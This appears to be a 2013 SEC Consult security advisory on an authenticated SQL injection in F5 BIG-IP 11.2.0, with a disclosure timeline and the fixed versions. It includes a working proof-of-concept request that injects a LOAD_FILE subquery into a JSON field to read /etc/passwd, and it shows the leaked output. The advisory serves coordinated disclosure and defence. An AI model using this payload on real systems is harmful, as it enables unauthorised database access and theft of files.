title: SQL Injection
product: F5 BIG-IP
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility?and ensures your applications
are fast, secure, and available."
URL: http://www.f5.com/products/big-ip/
A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).
Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=VALID_COOKIE
Content-Length: 119
{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) –
x" }
Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.
A request to /sam/admin/reports/php/getSettings.php returns the data:
HTTP/1.1 200 OK
…
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.
Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.
Update to 11.2.0 HF3 or 11.2.1 HF3.
No workaround available.
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehbock / @2013